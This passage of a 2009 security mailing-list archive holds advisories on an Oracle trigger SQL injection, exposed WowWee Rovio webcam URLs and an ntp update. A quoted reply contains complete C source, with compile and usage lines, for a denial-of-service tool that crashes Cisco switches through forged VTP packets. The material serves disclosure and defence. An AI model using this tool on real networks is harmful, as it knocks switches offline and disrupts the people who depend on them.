name CVE-2008-5449 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/08/2007  Initial Vendor Notification
03/08/2007  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbSVqbjs6HoxIfBkRArHaAJsFJIEtFoycfmcGAbikDpSDFvBrWwCfbLR0
qVu5Ie2NSW2bRoITpl4Jix4=VahW
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39161-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E51D4EC13C
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:26:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3A0942370B8; Wed, 14 Jan 2009 09:16:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19816 invoked from network); 13 Jan 2009 23:34:22 -0000
X-PMWin-Version: 3.0.2.0, Antivirus-Engine: 2.82.1, Antivirus-Data: 4.37E
Message-ID: <A875BEAACA374B739FA4B51E8CA6B632@HEDGEHOG>
From: "David Litchfield" <davidl@ngssoftware.com>
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Subject: Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2 
Date: Tue, 13 Jan 2009 23:52:02 -0000
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: quoted-printable
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6001.18000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325
X-OriginalArrivalTime: 13 Jan 2009 23:52:54.0630 (UTC) FILETIME=[0D7BB060:01C975DA]
Status:   


NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview
********
Oracle has just released a fix for a flaw that, when exploited, allows a low 
privileged authenticated database user to gain MDSYS privileges. This can be 
abused by an attacker to perform actions as the MDSYS user.

Details
*******
MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the 
Oracle Spatial Application. It is vulnerable to SQL injection. When a user 
drops a table the trigger fires. The name of the table is embedded in a 
dynamic SQL query which is then executed by the trigger. Note that the 
Oracle advisory states that the attacker requires the DROP TABLE and CREATE 
PROCEDURE privileges. This is not the case and only CREATE SESSION 
privileges are required.

Fix Information
***************
Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been 
made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner 
designed specifically for Oracle, can be used to accurately determine 
whether your servers are vulnerable to these flaws. More information about 
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware
*****************
NGSSoftware, an NCC Group Company, develops vulnerability assessment and 
compliancy tools for database servers including Oracle, Microsoft SQL 
Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS 
has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and 
Seattle in the United States; NGS provide services to some of the largest 
and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: Manchester Technology Centre,
Oxford Road, Manchester, M1 7EF with Company Number 04225835 and
VAT Number 783096402 

From - Wed Jan 14 12:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39169-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A62CEEC13E
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:39:54 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CFF4B143798; Wed, 14 Jan 2009 09:31:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28736 invoked from network); 14 Jan 2009 08:18:17 -0000
Message-ID: <795651f40901140041h2fb9d686xf3345e1a0df6ef3e@mail.gmail.com>
Date: Wed, 14 Jan 2009 03:41:59 -0500
From: "Brian Dowling" <bjd@simplicity.net>
To: bugtraq@securityfocus.com
Subject: WowWee Rovio - Insufficient Access Controls - Covert Audio/Video Snooping Possible
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Status:   

SUMMARY

WowWee Rovio - Insufficient Access Controls - Covert Audio/Video
Snooping Possible

OVERVIEW

Rovio from WowWee does not adequately secure all accessible URLs or media
streams, enabling an unauthorized user with network access to the robotic
webcam platform the ability to listen to and view audio/video streamed from
the device's onboard camera.  Additionally, audio-send capabilities are also
not secured, enabling mischievous sending of audio through Rovio's built-in
speaker.  Additional manipulations may be possible, robot control does not
appear to be impacted at this time.

DESCRIPTION

>From WowWee Website:

     Rovio(tm) is the ground breaking new Wi-Fi enable mobile webcam that lets
     you view and interact with its environment through streaming video and
     audio, wherever you are!

Unfortunately, Rovio's access control mechanisms (username/password) are not
completely utilized across the platform even when enabled.  Certain URLs and
RTSP Streaming capabilities of the device are accessible with no
authentication.  Furthermore, deployment of the device in the default
configuration attempts to use UPnP to automatically configure your firewall to
allow external access to the mobile webcam platform.

Resources exposed without proper access controls include:

rtsp://[rovio]/webcam   -- RTSP Audio/Video Stream, directly accessible.

and the following http://[rovio]:[publishedport]/ URLs are accessbile to anyone:

/GetUPnP.cgi            -- Get UPnP config, including ports in use for RTSP
/GetStatus.cgi          -- display general device status
/GetVer.cgi             -- display firmware version, enables targeted
                           attacks, discovery.
/ScanWlan.cgi           -- display WiFi Networks visible to device
/GetAudio.cgi           -- "Send" audio to Rovio's speaker, "What's up Doc?"
/GetMac.cgi             -- device mac adress
/Upload.cgi             -- upload new firmware [actual upload untested]
/GetUpdateProgress.cgi
/GetTime.cgi
/GetLogo.cgi
/GetName.cgi
/GetVNet.cgi
/description.xml
/cmgr/control
/cmgr/event
/cdir/control
/cdir/event
/Cmd.cgi                -- Accessible without arguments, but does not appear
                           to allow ACL bypass to normally protected
                           sub-commands.  Unknown if any hidden commands exist.

/SendHttp.cgi           -- When authentication is enabled, this appears to be
                           protected.  However in a default configuration with
                           no authentication, it could provide for interesting
                           reverse-proxy like manipulation of web-based
                           firewall admin interfaces.

                           Additionally, this script is used by the "Ping
                           Test" that WowWee sends to their servers to help
                           verify your internet connectivity and UPnP settings
                           are working.  What's disheartening here is that
                           your IP address and rovio's port are sent to WowWee
                           and potentially stored in their server logs.


ADDITIONAL ISSUES

Additionally, WowWee is advised that they should alter the default
configuration to not automatically utilize UPnP to attempt to open up external
access to these devices.

1) In the default configuration no authentication is required until the user
   sets up accounts.

2) Proper notification should be displayed to users regarding the potential
   risks and ramifications of these settings and they must be involved in the
   decision process, by being required to take action action to agree to
   expose such devices to external access.

Additionally, it should be noted that the platform uses HTTP Basic
authentication over unencrypted HTTP.  Using such mechanisms across the
internet does expose users to network-sniffing attacks, where an attacker
could obtain the credentials or observe the data streams being transmitted.

IMPACT

Users of this mobile wi-fi webcam may unwittingly open their homes up to
anonymous eaves-dropping of their personal lives and communications.

SOLUTION

WowWee must supply an updated firmware that fixes these issues.

WORKAROUND

Users of these devices are encouraged to disable direct external access and
seek other means to secure such access (Authenticated, Encyrpting Proxies, or
Access over a VPN connection for example).  It is understood that most
consumers of these devices do not have such means, so WowWee should be
compelled to provide adequate protection and access controls.

REFERENCES

http://www.simplicity.net/vuln/2009-01-Rovio-insecurity.html
http://www.wowwee.com/en/products/tech/household/rovio

CREDIT

This issue was discovered and disclosed by Brian Dowling of Simplicity
Communications.

HISTORY

2009-01-06 - Initial Report to WowWee support.
2009-01-07 - Second request to simply confirm reciept of my first notifciation.
2009-01-08 - Automated, canned response from web-submission form.
2009-01-14 - Due to lack of appropriate, timely response, additional insight
             contained above and general concern for users of these devices
             unknowingly being exposed in this way, this information has been
             publicly disclosed.  Hopefully as WowWee forays into more
             networked-enabled consumer devices they will provide proper
             channels and handling for vulnerability disclosure.

From - Wed Jan 14 12:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39162-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3C18CEC13E
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:40:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 81CEE2372F7; Wed, 14 Jan 2009 09:16:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21387 invoked from network); 14 Jan 2009 01:19:02 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=0WzLt4zw5x5KqPnv_gYA:9 a=MAQoSt062hDB8oogBEYA:7 a=Zcf9UHuJP3PpQnZEBIgCQJ0YQFIA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:007 ] ntp
Date: Tue, 13 Jan 2009 18:49:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMusP-0002OJ-9B@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:007
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ntp
 Date    : January 13, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A flaw was found in how NTP checked the return value of signature
 verification.  A remote attacker could use this to bypass certificate
 validation by using a malformed SSL/TLS signature (CVE-2009-0021).
 
 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 91f0330a936cb343029aec711da0ce4f  2008.0/i586/ntp-4.2.4-10.1mdv2008.0.i586.rpm
 e7e6559f0431ff856d0da0b1d5a590a4  2008.0/i586/ntp-client-4.2.4-10.1mdv2008.0.i586.rpm
 05f3b3c5777f6bef48ee85fefeaff8a8  2008.0/i586/ntp-doc-4.2.4-10.1mdv2008.0.i586.rpm 
 a9cd3b03e611b517664ffae074da31da  2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 e68c5263d456ec90d157787e70b17b99  2008.0/x86_64/ntp-4.2.4-10.1mdv2008.0.x86_64.rpm
 85e0c28eae68bcdcca997c5c2bb9bf8c  2008.0/x86_64/ntp-client-4.2.4-10.1mdv2008.0.x86_64.rpm
 ffbd2a9f924478d27f33ad13e1c4e250  2008.0/x86_64/ntp-doc-4.2.4-10.1mdv2008.0.x86_64.rpm 
 a9cd3b03e611b517664ffae074da31da  2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 1a9909288448845fa41b220b50917ee1  2008.1/i586/ntp-4.2.4-15.1mdv2008.1.i586.rpm
 6693319db15308f559912c9fe989bdd6  2008.1/i586/ntp-client-4.2.4-15.1mdv2008.1.i586.rpm
 63758cadb1cf81ebb7bef096dc285f2f  2008.1/i586/ntp-doc-4.2.4-15.1mdv2008.1.i586.rpm 
 ca06251ccab188cdb4f28fba35190eb6  2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 9c7b290e643cae08556bd3b1f6380926  2008.1/x86_64/ntp-4.2.4-15.1mdv2008.1.x86_64.rpm
 7fd00c9b82a0ca577962d59975433071  2008.1/x86_64/ntp-client-4.2.4-15.1mdv2008.1.x86_64.rpm
 f99d1d7980dd6788a0f0c4924241a6d3  2008.1/x86_64/ntp-doc-4.2.4-15.1mdv2008.1.x86_64.rpm 
 ca06251ccab188cdb4f28fba35190eb6  2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 82ed4b25f0a0c1c607e5819ec1d70603  2009.0/i586/ntp-4.2.4-18.1mdv2009.0.i586.rpm
 71855df81d8dd138d54fb24f5c221a5b  2009.0/i586/ntp-client-4.2.4-18.1mdv2009.0.i586.rpm
 30874a706c15d4086df8493af51f5082  2009.0/i586/ntp-doc-4.2.4-18.1mdv2009.0.i586.rpm 
 248052356a2606f377debf55257b6855  2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 c6462453877b538618e8bf8d0132b1a3  2009.0/x86_64/ntp-4.2.4-18.1mdv2009.0.x86_64.rpm
 abe80d9922eb665d6e5be56197895a68  2009.0/x86_64/ntp-client-4.2.4-18.1mdv2009.0.x86_64.rpm
 eb780b2e38ebb1b4ee1999c4f0429231  2009.0/x86_64/ntp-doc-4.2.4-18.1mdv2009.0.x86_64.rpm 
 248052356a2606f377debf55257b6855  2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm

 Corporate 3.0:
 d1593543a5d37e6b8ea2c8468ce1d0d3  corporate/3.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm 
 fc6c1a4605258d876c8a09d7d0d116ef  corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1214dd1fed42c4acd3ad36da9bd8b0ea  corporate/3.0/x86_64/ntp-4.2.0-2.1.C30mdk.x86_64.rpm 
 fc6c1a4605258d876c8a09d7d0d116ef  corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm

 Corporate 4.0:
 dcc6abed648d3baac3233264bc107517  corporate/4.0/i586/ntp-4.2.0-21.3.20060mlcs4.i586.rpm
 d1c9cf4d821856af81ce574fa08c1f52  corporate/4.0/i586/ntp-client-4.2.0-21.3.20060mlcs4.i586.rpm 
 50c665296cd7d09f4e98ae04e998e350  corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 6c41fd0f995d8cf8cf216bf82e062de0  corporate/4.0/x86_64/ntp-4.2.0-21.3.20060mlcs4.x86_64.rpm
 da7f3cd1385ae2250cd191182079c037  corporate/4.0/x86_64/ntp-client-4.2.0-21.3.20060mlcs4.x86_64.rpm 
 50c665296cd7d09f4e98ae04e998e350  corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 d7ff99538a0da678adcc5606913bc1b6  mnf/2.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm 
 c8af767376df674dd434307c628e30cd  mnf/2.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbRVSmqjQ0CJFipgRAt23AJ43dVc9u32PRtOsFf8+xdJzSIx+wACdFIK3
LT/YaZTGtZnOdbhIr2LV9dg#nb
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d8
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39163-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id AAA07EC14D
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:52:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A7CF02373A8; Wed, 14 Jan 2009 09:16:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24328 invoked from network); 14 Jan 2009 04:12:48 -0000
X-IronPort-AV: E=Sophos;i="4.37,261,1231113600"; 
   d="scan'208";a="38659566"
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: DoS code for Cisco VLAN Trunking Protocol Vulnerability
Date: Wed, 14 Jan 2009 11:50:38 +0800
Message-ID: <BFD4D243999BA5458F6A8AC2CB3575050515E7D0@xmb-hkg-416.apac.cisco.com>
In-Reply-To: <a465357d0901131558u6dbca85aqf00758c8001cced4@mail.gmail.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: DoS code for Cisco VLAN Trunking Protocol Vulnerability
thread-index: Acl12uWGulbYpOkXSo+7APPNNb0b3wAIDjWw
References: <a465357d0901131558u6dbca85aqf00758c8001cced4@mail.gmail.com>
From: "Paul Oxman (poxman)" <poxman@cisco.com>
To: "showrun.lee" <showrun.lee@gmail.com>,
<bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>
X-OriginalArrivalTime: 14 Jan 2009 03:52:29.0056 (UTC) FILETIME=[854F0800:01C975FB]
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; lg23; t31905154; x32769154;
c=relaxed/simple; s=hkgdkim1002;
h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version;
d=cisco.com; i=poxman@cisco.com;
z=From: "Paul Oxman (poxman)" <poxman@cisco.com>
|Subject: RE: DoS code for Cisco VLAN Trunk
ing Protocol Vulnerability
|Sender: ;
bh=+JKXu/UzBbsom/2el0/Lqwkb86x1jrpTORtxroeY88o=;
b=ODT2KBK9RKEjxQrpSUsC/m+mYoXVLqfhnO/5aPetiBB6XOz/J98nlmaS1H
FbipWiK/a4KaVpfSVRTkOG5NPfbaJdEsat9mXb99vPEWV3BgUVjQm/fwFXjA
KAagIDTEZs9xGi9yhrzkt9hiXUhP2yUR2a7Xb3jq7DeUThuA+ka48=;
Authentication-Results: hkg-dkim-1; header.DKIM-Signature=poxman@cisco.com; dkim�il (
DNS lookup for cisco.com/hkgdkim1002 failed; cisco.com/hkgdk
im1002 fail; ); 
header.From=poxman@cisco.com; dkim=neutral
Status:   

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
This is Paul Oxman with Cisco PSIRT.

For mitigations and workarounds, please consult the Cisco 
Security Response available at: 
http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

Regards

________________________________

From: showrun.lee [mailto:showrun.lee@gmail.com] 
Sent: Wednesday, January 14, 2009 7:59 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Cc: Paul Oxman (poxman)
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability


/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulerability discription:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To Known:
 * 1.the switch must in Server/Client Mode.
 * 2.the port ,attacker connected,must be in trunk Mode.
 *   Cisco Ethernet ports with no configuration are not 
 *   in trunk.but trunk mode can be obtained through DTP
 *   attack by Yersinia.
 * 3.you must known the vtp domain,this can be sniffed
 * 4.some codes are from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 * 
 *Usage:vtp -i <interface> -d <vtp_domain>
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
          
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must
assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision
number will ok 
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
     
//build the second vtp packet for vtp_subset 
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
     
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain)); 
     vtp_sub->revision = htonl(2000);//bigger than the current revision
number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa)); 
     
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSW1hDvOp/xnPFP7gEQKwFQCfQ32qUNzWFL8dISsQew6+JQAFcnoAnRKq
yEEThaENUXT3HaLpVs+mdMHD
=U4Vq
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39172-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
